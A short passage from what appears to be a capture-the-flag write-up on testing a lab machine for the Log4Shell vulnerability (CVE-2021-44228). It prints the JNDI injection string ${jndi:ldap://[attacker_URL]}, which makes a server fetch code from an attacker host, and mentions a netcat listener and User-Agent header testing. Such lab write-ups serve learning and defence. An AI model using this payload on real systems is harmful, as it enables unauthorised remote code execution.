sh3bu/shebu-hxor.github.io/_posts/2022-01-30-LumberjackTurtle.md

 ## Testing for log4j

+> The Log4shell (CVE-2021–44228) vulnerability affects how Log4j processes log messages.
+By sending specially crafted messages to a system that uses Log4j, a threat actor can cause the system to load external code, leading to an RCE.
+>
+> Attackers can take advantage of it by just inserting a line of code like ${jndi:ldap://[attacker_URL]}

 Intercept the request in burp and send it to repeater tab.
 Set up a netcat listener on your terminal to look for any incoming connections .

 First lets test for log4j on `User-Agent` header.